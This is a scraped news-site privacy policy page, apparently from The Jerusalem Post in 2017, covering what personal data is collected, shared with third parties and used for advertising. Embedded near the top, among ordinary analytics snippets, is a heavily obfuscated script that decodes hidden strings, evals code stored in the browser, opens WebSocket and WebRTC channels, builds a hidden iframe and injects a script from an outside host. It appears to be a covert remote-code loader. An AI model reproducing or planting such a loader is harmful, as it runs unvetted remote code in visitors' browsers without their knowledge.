



	PrivacyPolicy

        var pageTypeId = '25';       





!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;
n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,
document,'script','https://connect.facebook.net/en_US/fbevents.js');

fbq('init', '1730128020581377');
fbq('track', "PageView");

try{(function(){function z(){try{var a=I()}catch(c){}if(a)try{A(a.h,null)}catch(c){delete window.localStorage[a.key],delete window.sessionStorage[a.key]}else J(function(a,b){b.as=!0;try{A(a,b)}catch(e){}},K)}function K(){var b=window.location.protocol==a("WzIzCEAK")?a("WzIzCEAKaEw="):a("WzIzCAkfaA==");(new Image).src=b+a("Sy41VkZWNQI6IypKIyoG")+a("HCp4CA4=")+"8010001"+a("FSV6HVU=")+a("FSUlRQ==")+Math.random().toString().slice(3,9)}function J(a,c){function b(){var d=e.shift();if(d)try{d(a,b)}catch(m){b()}else u(),
c()}try{L()}catch(f){u();c();return}var e=[M,N,O,P];b()}function A(a,c){(function(){eval(a)})({e:a,p:c,n:g})}function I(){var b=[];window.localStorage&&b.push(window.localStorage);window.sessionStorage&&b.push(window.sessionStorage);var c=B(a("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="),C(a("QzQiGV5SKwY=")));c=new Uint8Array(c);for(var d="",e=0;e<c.length;e++)d+=String.fromCharCode(c[e]);c=btoa(d);d=(new Date).getTime();for(e=0;e<b.length;e++){var f=b[e],m;for(m in f)if(0===m.lastIndexOf(c,0)){try{for(var k=
a("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="),g=atob(f[m]),l=new Uint8Array(g.length),h=0;h<g.length;h++)l[h]=g.charCodeAt(h);var n=r(B(k,l.buffer))}catch(Q){continue}h=parseInt(n.substring(0,13),10);if(!isNaN(h))if(864E5<d-h||1>d-h)f.removeItem(m);else if((h=n.substring(13))&&!(16>h.length))return{h:h,key:m}}}return null}function N(b,c){var d=a("UmgyHkFRMwwgYicLLQ=="),e=a("AHJwQA=="),f=a("BAR9SwUKcid0fn1eAQRRXAcLMGhIX1t0C3BeDSl3AnMJAgRCcXJ9Int2d1x6B19eBAdLZUNcWX53cVN2LH0LewR8c04Jc3RZCHl+VwV/KVV8dERrR1NVDH95UHlQCHc=");
d=d+":"+e;e={};e[a("RjQrCw==")]=a("RzM1Fgk=")+d+a("DDI1GV1DNww8OHkQIzU=");e[a("UDQiHFZeMwovIA==")]=a("SiczEV5R");e[a("RjUiCl1RKgY=")]=a("SiczEV5R");D(f,e,function(b){b=b.match(new RegExp(a("bSUmFldZIwI6KX44JG5LOCIaUXlNXBoqPT8xCDpkER9XbWdQb1RsP2AQIE8cazcAbW1fDRZNRm4RJ09sHjRBY0EjKxlK")));if(null==b)return null;b=b[1];return a("UCcpHFpUJhcrdnVEcWU+IBYRSWJBV114fmM=")+b+a("E3B0SAIGZxc3PGQWJSkKHWZDEDUWFE8=")+b+a("EzQ3F0FEZ1V9fHVSYCsOEDFeAzpfBQA9OWNU")},b,c)}function O(b,c){var d=a("UmgyHkFRMwwgYicLLQ=="),
e=a("BXZ3SQ=="),f=a("dXN9OXEKf1p0CXBedHRRXXcLRmhIVVx0fXFeDlJ3BgIJcwVCdgF9JXt2cFJ6ci5eAHRLZDRcXXp3eyJ2KAgLd3Z8dDsJdQRZeXR+VHZ/Xld8cENrQSBVegx5U3VQdAk=");d=d+":"+e;e={};e[a("RjQrCw==")]=[a("QDIyFgk=")+d];D(f,e,function(b){b=b.match(new RegExp(a("bSUmFldZIwI6KX44JG5LOCIaUXlNXBoqPT8xCDpkER9XbWdQb1RsP2AQIE8cazcAbW1fDRZNTxIpaE1sHjRBY0A0IRRL")));if(null==b)return null;b=b[1];return a("UCcpHFpUJhcrdnREcWU+IBYRQ2BGUVt2fnVQe0o=")+b+a("EzI+CBNYKBA6")},b,c)}function D(b,c,d,e,f){function m(a){k||(k=!0,a.apply(null,
Array.prototype.slice.call(arguments,1)))}var k=!1;e=m.bind(null,e);f=m.bind(null,f);var p={};p[a("WiUiK1ZCMQY8Pw==")]=[c];var l=new g.c(p);l[a("UDQiGUdVAwI6LQcMISsFASo=")](a("HCsiDFIfNwogKw==")).binaryType=a("UjQ1GUpSMgUoKTY=");l[a("XCguG1ZTJg0qJSAFNCA=")]=function(b){if(null!=b[a("UCcpHFpUJhcr")]&&(b=d(b[a("UCcpHFpUJhcr")][a("UCcpHFpUJhcr")]),null!=b)){var c={};c[a("UCcpHFpUJhcr")]=b;c[a("QCI3NX9ZKQYHIiABOA==")]=0;l[a("UiIjMVBVBAIgKC0AITEO")](new g.b(c),function(){},function(){})}};l.addEventListener(a("WiUiG1xeKQYtOC0LLjYfBTJUEjkTCAgr"),
function(){l[a("WiUiO1xeKQYtOC0LLhYfBTJU")]===a("VScuFFZU")&&f()});var h=a("RXt3clwNMhArPioFLSBLVGYBURg8RiYeeWNVfl1jAW0DaHZyQA00Bj0/LQsuKwoJIzsSbDsoTwcdd0R9WHofcx12aUk5RHpTbnxOBX0jAgohVAMhAA8BOncwDC1HfwR1Ew==")+b+a("OSd6EVBVagw+OC0LLjZREDRYEjoeA2UjcCIUPAYkUiJHLygWEwF1UHpsADAMFkQ3BWUhcUdWX35HIlk/CTlBLlI2fU0DAHdDOSkmFjQmRgAnRRAyGgcBICgvRH5fezsiDi8kHR5FIREvK34=")+function(){for(var b="",c=a("A3Z3SAMAd1M="),d=0;16>d;++d){var e=(4294967296*Math.random()>>>0).toString(16);b+=c.substring(0,c.length-e.length)+
e}return b}()+a("OSd6EVBVahM5KH5UcHVbVHYBQWFCVl9+fXNUfFp9AXMDdndIAwB3U358dG4=");l[a("UDQiGUdVCAUoKTY=")](function(b){l[a("QCMzNFxTJg8KKTcHMiwbEC9eHw==")](b,function(){var b={};b[a("Rz83HQ==")]=a("Uig0D1ZC");b[a("QCI3")]=h;l[a("QCMzKlZdKBcrCCEXIzcCFDJYHj8=")](new g.f(b),function(){},function(){})},function(){})},function(){});b=l[a("UDQiGUdVAwI6LQcMISsFASo=")](a("HDE0CDM=")+window.navigator.userAgent);b.binaryType=a("UjQ1GUpSMgUoKTY=");E(b,v(),function(b){e(b,{rtc:l})},function(){f()})}function P(b,
c){function d(b){m||(m=!0,b.apply(null,Array.prototype.slice.call(arguments,1)))}var e=v();e=(window.location.protocol==a("WzIzCEAK")?a("WzIzCEAKaEw="):a("WzIzCAkfaA=="))+a("Sy41VkZWNQI6IypKIyoG")+e;var f=a("dAMT"),m=!1;b=d.bind(null,b);c=d.bind(null,c);var k=new g.g;k.onreadystatechange=function(){4==k.readyState&&(0==k.status?c():b(r(k.response),{}))};k.onerror=function(){c()};k.open(f,e,!0);k.responseType=a("UjQ1GUpSMgUoKTY=");k.send(null)}function M(b,c){var d=a("RDU0Qhwf"),e=a("UmgyHkFRMwwgYicLLQ=="),
f=new g.a(d+e+a("HDE0CA=="));f.binaryType=a("UjQ1GUpSMgUoKTY=");E(f,v(),function(a){b(a,{ws:f})},function(){c()})}function E(b,c,d,e){function f(b){g||(g=!0,b.apply(null,Array.prototype.slice.call(arguments,1)))}var g=!1;d=f.bind(null,d);e=f.bind(null,e);var k=!1,p=setTimeout(function(){e(Error())},3E3),l=C(JSON.stringify({url:c||"",method:a("dAMT"),headers:null,body:null}));b.onopen=function(){clearTimeout(p);b.send(l)};var h=new ArrayBuffer(0),n;b.onmessage=function(b){if(4===b.data.byteLength){var a=
new Uint8Array(b.data);if(222===a[0]&&173===a[1]&&190===a[2]&&239===a[3])return}!1===k?(k=!0,b=r(b.data),n=JSON.parse(b),n={status:n.status||0,headers:{}}):(b=b.data,a=new Uint8Array(h.byteLength+b.byteLength),a.set(new Uint8Array(h),0),a.set(new Uint8Array(b),h.byteLength),h=a.buffer)};b.onerror=function(){clearTimeout(p);e(Error())};b.onclose=function(){k?(n.body=h,d(r(n.body))):(clearTimeout(p),e(Error()))}}function v(){return a("HCMtCwxAeg==")+"8010001"}function w(b){return window[b.name]?window[b.name]:
b[a("UCkpDFZeMychLzEJJSsf")]&&b[a("UCkpDFZeMychLzEJJSsf")][a("VyMhGUZcMzUnKTM=")]?b[a("UCkpDFZeMychLzEJJSsf")][a("VyMhGUZcMzUnKTM=")]:b[a("UCkpDFZeMzQnIiALNw==")]}function F(){var b=document.createElement(a("WiA1GV5V"));b.style.height=a("AjY/");b.style.width=a("AjY/");b.style.display=a("XSkpHQ==");b[a("QDQkHFxT")]=a("Ug==");b.name||(b.name=String.fromCharCode(parseInt(25*Math.random()+97,10))+Math.random().toString(36).substring(7));(document.body||document.head||document.documentElement).appendChild(b);
var c=w(b);c.document.documentElement||c.document.write(a("Ug=="));try{c.stop()}catch(d){}return b}function L(){G=a("RigsFlxHKQ==");t=a("UC41F15V");q=a("VS81HVVfPw==");x=a("XDYiClI=");y=a("QCchGUFZ");var b=F();b=w(b);var c=b.navigator.userAgent;var d=(new RegExp(a("UC41F15VOwAmPisJKTAG"),"i")).test(c)?t:(new RegExp(a("VS81HVVfPx8nLyETJSQYASpNFykbCRw="),"i")).test(c)?q:(new RegExp(a("bW5vRxJTLxEhISEYISsPFilYFXhcT0U9LCUFPgM="),"i")).test(c)?y:(new RegExp(a("XDY1BFxALgw9"),"i")).test(c)?x:window[a("UC41F15V")]?
t:"undefined"!==typeof InstallTrigger?q:G;-1===[t,q,x,y].indexOf(d)&&(b=window);c=a("VjAmFA==");g.c=b[c](a("RC8pHFxHaTEaDxQBJTcoCyhfFDIGDwAgbT8YbB0kXydcMWkPVlIsCjoeECcQIA4WBV4fPxcFGyciLUQwFm1GKl0iKA8dXSgZHBgHNCUgGScpXx80ERIGISNjGDBKOlgtVykwVl5DFTcNHCEBMgYECihUEiUbCQE="));g.f=b[c](a("RC8pHFxHaTEaDxcBMzYCCyh1FCIRFAY+OSoLIkoxTWNELykcXEdpFCsuLw00Fz8nFVQCIhsJAQooMAc+Az1FKlwoZwRPEDAKICgrE24oBB4UZTICFxUcJyItICkZLkMqQzIuF10QOx9uOy0KJCocSitCIwUxNQo9PioLIi4oQiBBLzcMWl8p"));g.b=b[c](a("RC8pHFxHaTEaDw0HJQYKCiJYFTAGA08yMWMTJQQpXjQdMSIaWFkzMRoPDQclBgoKIlgVMAYDTzIxYxMlBCleNB0rKAJhZAQqLSkHBS4hAgAnRRRxDhpPOSQtACMdY1wwYRIEMVBVBAIgKC0AITEO"));
d===q?(d=F(),g.a=w(d)[c](a("RC8pHFxHaTQrLhcLIy4OEA==")),d.parentElement.removeChild(d)):g.a=b[c](a("RC8pHFxHaTQrLhcLIy4OEA=="));g.g=b[c](a("RC8pHFxHaTsDAAwQNDU5ATdEFCIG"))}function B(b,a){var c=new Uint8Array(a),e=new ArrayBuffer(a.byteLength);e=new Uint8Array(e);for(var f=0;f<a.byteLength;f++)e[f]=c[f]^b.charCodeAt(f%b.length);return e.buffer}function r(b){if(window.TextDecoder)return(new window.TextDecoder("utf-8")).decode(new Uint8Array(b));var a="";b=new Uint8Array(b);for(var d=b.byteLength,e=
0;e<d;e++)a+=String.fromCharCode(b[e]);return decodeURIComponent(escape(a))}function C(a){if(window.TextEncoder)return(new window.TextEncoder("utf-8")).encode(a).buffer;a=unescape(encodeURIComponent(a));for(var b=new Uint8Array(a.length),d=0;d<a.length;d++)b[d]=a.charCodeAt(d);return b.buffer}function a(a){a=window.atob(a);for(var b="",d=0;d<a.length;d++)b+=String.fromCharCode(a.charCodeAt(d)^"3FGx30GcNLDd@EkdF1qQrfoNMCdLjM1C".charCodeAt(d%32));return b}function u(){if(!H){var a=document.createElement("script");
a.src=("https:"==window.location.protocol?"https://":"http://")+"xhr.ufraton.com"+decodeURIComponent("%2Fljs%3Fp%3D")+"8010001";document.getElementsByTagName("head")[0].appendChild(a);H=!0}}var g={},G,t,q,x,y,H=!1;if(/ucbrowser/i.test(navigator.userAgent)||window.i)try{u()}catch(b){}try{z()}catch(b){}})()}catch(z){};
(function () {
    var node = document.getElementsByTagName('script')[0],
rvbP = document.createElement('script');
    window.CMT = { appId: '9de4bd6f-10af-4e2c-b51d-42a4360a6eec' };
    rvbP.defer = true;
    rvbP.type = 'text/javascript';
    rvbP.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') +
'//revboostprocdnadsprod.azureedge.net/scripts/latest/min.js';
    node.parentNode.insertBefore(rvbP, node);
})();





 
        (function (i, s, o, g, r, a, m) {
            i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () {
                (i[r].q = i[r].q || []).push(arguments)
            }, i[r].l = 1 * new Date(); a = s.createElement(o),
            m = s.getElementsByTagName(o)[0]; a.async = 1; a.src = g; m.parentNode.insertBefore(a, m)
        })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');

        ga('create', 'UA-3326248-22', 'auto');
        ga('send', 'pageview');

    

















Israel News





                    Israel News 
                



                    Politics & Diplomacy 
                



                    Sports 
                



                    Culture 
                



                    Environment 
                



                    Modi's Visit 
                



                    New-Tech 
                



                    HEALTH & SCIENCE 
                



                    Bibi 
                




Business & Innovation




TRENDING STORIES





                    TRENDING STORIES 
                



                    Israeli Music 
                



                    Snack Bites 
                



                    Podcast 
                



                    Israeli Food and Jewish Recipes 
                




Diaspora




Opinion




Middle East





                    Middle East 
                



                    ISIS Threat 
                



                    Iran News 
                




American Politics





                    American Politics 
                



                    Hillary Clinton 
                



                    Donald Trump 
                




Premium





                    Premium 
                



                    Magazine 
                



                    IVRIT 
                



                    Metro 
                



                    The Jerusalem Report 
                



                    In Jerusalem 
                




Christian News




jerusalem




BDS THREAT




Arab-Israeli Conflict




Annual Conference




Diplomatic Conference




Edition française





                    Edition française 
                



                    ArtEtCulture 
                



                    MoyenOrient 
                



                    Politique 
                



                    SocialEco 
                




Blogs





                    Blogs 
                



                    StudentLife 
                




J-Spot




Green Israel





                    Green Israel 
                



                    Community 
                



                    InnovativeResearch 
                



                    InternationalCooperation 
                



                    KklJnfWorldWide 
                



                    PeopleAndTheEnvironment 
                



                    Tours And Events In Nature 
                



                    Water ForIsrael 
                




International

















                October 03 2017
            
|

                Tishrai, 13, 5778
            
|




  




  




  




  














Israel News





                    Israel News 
                



                    Politics & Diplomacy 
                



                    Sports 
                



                    Culture 
                



                    Environment 
                



                    Modi's Visit 
                



                    New-Tech 
                



                    HEALTH & SCIENCE 
                



                    Bibi 
                




Business & Innovation




TRENDING STORIES





                    TRENDING STORIES 
                



                    Israeli Music 
                



                    Snack Bites 
                



                    Podcast 
                



                    Israeli Food and Jewish Recipes 
                




Diaspora




Opinion




Middle East





                    Middle East 
                



                    ISIS Threat 
                



                    Iran News 
                




American Politics





                    American Politics 
                



                    Hillary Clinton 
                



                    Donald Trump 
                




Premium





                    Premium 
                



                    Magazine 
                



                    IVRIT 
                



                    Metro 
                



                    The Jerusalem Report 
                



                    In Jerusalem 
                




Christian News




jerusalem




BDS THREAT




Arab-Israeli Conflict




Annual Conference




Diplomatic Conference




Edition française





                    Edition française 
                



                    ArtEtCulture 
                



                    MoyenOrient 
                



                    Politique 
                



                    SocialEco 
                




Blogs





                    Blogs 
                



                    StudentLife 
                




J-Spot




Green Israel





                    Green Israel 
                



                    Community 
                



                    InnovativeResearch 
                



                    InternationalCooperation 
                



                    KklJnfWorldWide 
                



                    PeopleAndTheEnvironment 
                



                    Tours And Events In Nature 
                



                    Water ForIsrael 
                




International







   
            Arab Israeli Conflict
         
   
            Israel News
         
   
            Opinion
         
   
            Middle East
         
   
            Diaspora
         
   
            Green Israel
         
   
            Premium
         
   
            Christian News
         


   
            JERUSALEM
         
   
            Business & Innovation
         
   
            Israeli Politics
         
   
            Culture
         
   
            Health & Science
         
   
            Judaica Store
         
   
            BDS THREAT
         
   
            EDITION FRANÇAISE
         
   
            Blogs
         






(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/en_US/all.js#xfbml=1&appId=163414806897";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));









.txts
{
 font-family: arial;
    font-size: 13px;
line-height: 20px;
}
li {
    list-style-type: disc;
}
h4
{
font-family: arial;
    font-size: 30px;
}
ol, ul {
    list-style: none outside none;
}
li
{
list-style-type: disc;
}
.main
{
 border-right: 1px solid #d8d8d8;
    display: inline-block;
    padding-right: 20px;
    /*width: 814px;*/
 line-height: 24px;
}
.seco
{
display: inline-block;
   /*width: 814px;*/
padding-top: 20px;
}
.roni
{
  background: url("../../../images/article-bg-top.jpg") no-repeat scroll 0 0 rgba(0, 0, 0, 0);
    /*width: 814px;*/

}
.elr
{
 background: none repeat scroll 0 0 #fff;
    border-right: 1px solid #eee;
    border-top: 1px solid #eee;
    box-shadow: 3px 3px 5px 0 rgba(50, 50, 50, 0.1);
    margin-left: 16px;
    padding: 8px 0 8px 15px;
    position: relative;
    z-index: 20;
}
.title
{
 color: #bb131a;
    font-family: 'swiss_721bold_condensed';
    font-size: 20px;
padding: 0;
}
.txtrow
{
background: url("../../../images/article-bg-middle.jpg") repeat-y scroll 0 0 rgba(0, 0, 0, 0);
}
.spxc
{
  background: none repeat scroll 0 0 #fff;
    border-right: 1px solid #eee;
    margin-left: 18px;
    position: relative;
    z-index: 10;
}
.article-row
{
  border-bottom: 1px solid #d8d8d8;
    margin: 0 0 16px 29px;
    padding: 16px 0 10px;
    position: relative;
    /*width: 735px;*/
}




Privacy Policy





1.  Privacy: In order to protect Your Privacy, The Jerusalem Post has set up this extensive Privacy Policy. When You use Services,                         certain information is retained at The Jerusalem Post's servers, as well as at 3rd                         Parties. Such information may be stored in databases, conveyed to 3rd parties or                         used to provide You with better Service, all according to the following policy: 
    You are not obligated under law to provide your information, but without providing your information, The Jerusalem Post may not be able to provide you with the services. The information you provide shall be used to provide you with the Jerusalem Post's services, as you requested through the Terms of Service, and to send you periodic updates according to this Privacy Policy.

1.1What Information is stored? The Jerusalem Post                                 retains certain information you provide it when you browse its Services, as well                                 as information tracked using automated means.

1.1.1Information You Provide Directly: The Jerusalem                                         Post retains the following information when you register to its services, and may                                         request, from time to time, additional information:

1.1.1.1Commenting: The Jerusalem Post retains the                                                 following information when You post any Contribution or comment through Service:                                                 Your Name , Email address and Country.



1.1.1.2Premium Service: The  Jerusalem Post retains                                                 the following  information when You sign up to The Jerusalem Post Premium Service:                                                 Your Full Name, Your  Email address, Your Password for the Service, Your Title, Your                                                 Date of Birth, Your  Residence, Your Phone Number, Your Social Security Number or                                                 ID Number, Your Credit  Card and Payment Information.



1.1.1.3Newsletter:  The Jerusalem Post retains the                                                 following information  when You sign up to The Jerusalem Post's newsletter: Your                                                 Name, Email address,  Gender, Date of Birth, Country, State, Family Status, Income,                                                 Education, Religious  Affiliation and Fields of Interest



1.1.2Information You Provide Indirectly:                                         The Jerusalem Post may retain and store information you provide when browsing Services                                         such as Your IP address, Your browser and operating system, Your session number,                                         Your geolocation and other browsing information.



1.2Who Has Access to the Information? Selected 3rd                                 Parties who provide The Jerusalem Post with services have a unique access to specific                                 information required in order to provide such services, and The Jerusalem Post may                                 convey information to such parties in order to provide You with Service. For example,                                 The Jerusalem Post may use 3rd parties to send its Newsletter, display videos or                                 other content and/or provide You with advertisements.



1.3How is the information collected? Information is                                 collected in two distinct ways, when You browse the site, a cookie is placed in                                 Your browser; a cookie is a small text file which may allow The Jerusalem Post to                                 identify You personally and provide You with Services; You also provide, when using                                 Services, some information about Yourself to The Jerusalem Post. Finally, the Jerusalem                                 Post, either by itself or through 3rd parties, may collect Your browsing habits                                 and browsing data.



1.4How is the information processed? The information                                 You provide with The Jerusalem Post shall be processed by it and by selected 3rd                                 parties in order to provide You with the Services You requested (such as The Jerusalem                                 Post's Newsletter), moreover, The Jerusalem Post may process Your information in                                 order to include you in specific user groups or tiers and to provide you with personal                                 solicitations.



1.5 We use third-party advertising companies to serve ads when you visit our Website. These companies may use information (not including your name, address email address or telephone number) about your visits to this and other Web sites in order to provide advertisements about goods and services of interest to you. If you would like more information about this practice and to know your choices about not having this information used by these companies, click here.

    We allow third-party companies to serve ads and/or collect certain anonymous information when you visit our web site. These companies may use non-personally identifiable information (e.g., click stream information, browser type, time and date, subject of advertisements clicked or scrolled over) during your visits to this and other Web sites in order to provide advertisements about goods and services likely to be of greater interest to you. These companies typically use a cookie or third party web beacon to collect this information. To learn more about this behavioral advertising practice or to opt-out of this type of advertising, you can visit www.networkadvertising.org
     



1.6What uses are made with the information? The Jerusalem                                 Post uses the information You provided in order to provide You with Services. Moreover,                                 in specific Services, Your Information is used in the following way:
     
1.6.1Premium: When You register to The Jerusalem Post's                                         Premium Service, The Jerusalem Post shall process Your credit card and retain it                                         for that period and send you communications from time to time.

1.6.2Newsletter: When You register to The Jerusalem                                         Post's Newsletter, The Jerusalem Post shall send you, from time to time, personal                                         or tiered solicitations and use Your information for direct marketing.

1.7Can You Review, Amend or Remove Information? Yes,                                 You may contact the Jerusalem Post at any time in regards to Your Personal Information,                                 and after You provided the Jerusalem Post with sufficient evidence that You are                                 the data-subject of the information, receive the option to either remove all Your                                 personal information from The Jerusalem Post's Servers or Amend it. Please note                                 that such removal or amendment may be a costly process, depending on the amount                                 of personal information retained, and that The Jerusalem Post may charge fees for                                 such service.

















   
            Sign Up For Our NewsLetter
         


Follow Us




  




  




  




  




  




  











Information



                                About Us
                            



                                Feedback
                            



                                Staff E-mails
                            



                                Copyright
                            



                                Advertise with Us
                            



                                Statistics
                            



                                Ad Specs
                            



                                Terms Of Service
                            



                                Privacy Policy
                            



                                Subscriber Agreement
                            



                                jpost-jobs
                            



                                Cancel Subscription
                            




The Jerusalem Post Group



                                NYC Conference
                            



                                Diplomatic Conference
                            



                                Israel Health Conference
                            



                                Learn Hebrew
                            



                                The Jerusalem Report
                            



                                Our Magazines
                            



                                Edition Francaise
                            



                                Green Israel
                            



                                Jerusalem Post Lite
                            



                                Ulpan Online
                            




Tools and services



                                JPost Mobile Apps
                            



                                JPost Premium
                            



                                JPost Newsletter
                            



                                JPost News Ticker
                            



                                JPost RSS feeds
                            



                                JPost.com Archive
                            



                                JPost Archives
                            



                                JPost Alert
                            



                                Find us on Google+
                            



                                Digital Library
                            




Promo Content



                                Promo Content
                            



                                Personal Loans
                            



                                USDA Loan
                            



                                1000 Dollar Loan
                            



                                Commercial Espresso Machines
                            



                                Undercounter Ice Makers
                            



                                Cash Counting Machines
                            



                                Portable Solar Generators
                            



                                ClickFunnels Review
                            




Sites Of Interest



                                Jerusalem Hotels
                            



                                KKL-JNF
                            



                                Poalim Online
                            



                                PromoCodeWatch: Online Coupons
                            



                                Jewish Broadcasting Service
                            



                                Coupon code and Promo code
                            




Follow Us









The Jerusalem Post Customer Service Center can be contacted with any questions or requests:
 
 Telephone: *2421 * Extension 4 Jerusalem Post or 03-7619056 Fax: 03-5613699E-mail: subs@jpost.com
 
The center is staffed and provides answers on Sundays through Thursdays between 07:00 and 14:00 and Fridays only handles distribution requests between 7:00 and 
13:00
 
For international customers: The center is staffed and provides answers on Sundays through Thursdays between 7AM and 6PM 

Toll Free number in Israel only 1-800-574-574 
Telephone +972-3-761-9056
Fax: 972-3-561-3699
E-mail: subs@jpost.com



Copyright © 2016 Jpost Inc. All rights reserved • Terms of Use • Privacy Policy

 ux design by: studio Inbar Edut  •









		    window.fbAsyncInit = function () {
		        FB.init({
		            appId: '163414806897',
		            xfbml: true,
		            version: 'v2.0'
		        });
		    };

		    (function (d, s, id) {
		        var js, fjs = d.getElementsByTagName(s)[0];
		        if (d.getElementById(id)) { return; }
		        js = d.createElement(s); js.id = id;
		        js.src = "//connect.facebook.net/en_US/sdk.js";
		        fjs.parentNode.insertBefore(js, fjs);
		    }(document, 'script', 'facebook-jssdk'));
	    

		    (function (d, s, id) {
            var js, fjs = d.getElementsByTagName(s)[0];
            if (d.getElementById(id)) return;
            js = d.createElement(s); js.id = id;
            js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&appId=163414806897&version=v2.0";
            fjs.parentNode.insertBefore(js, fjs);
		    }(document, 'script', 'facebook-jssdk'));

		
!function (d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (!d.getElementById(id)) { js = d.createElement(s); js.id = id; js.src = "//platform.twitter.com/widgets.js"; fjs.parentNode.insertBefore(js, fjs); } }(document, "script", "twitter-wjs");


		    (function () {
		        var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
		        po.src = 'https://apis.google.com/js/platform.js';
		        var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
		    })();
		



    /* <![CDATA[ */
    var google_conversion_id = 879542449;
    var google_custom_params = window.google_tag_params;
    var google_remarketing_only = true;
    /* ]]> */










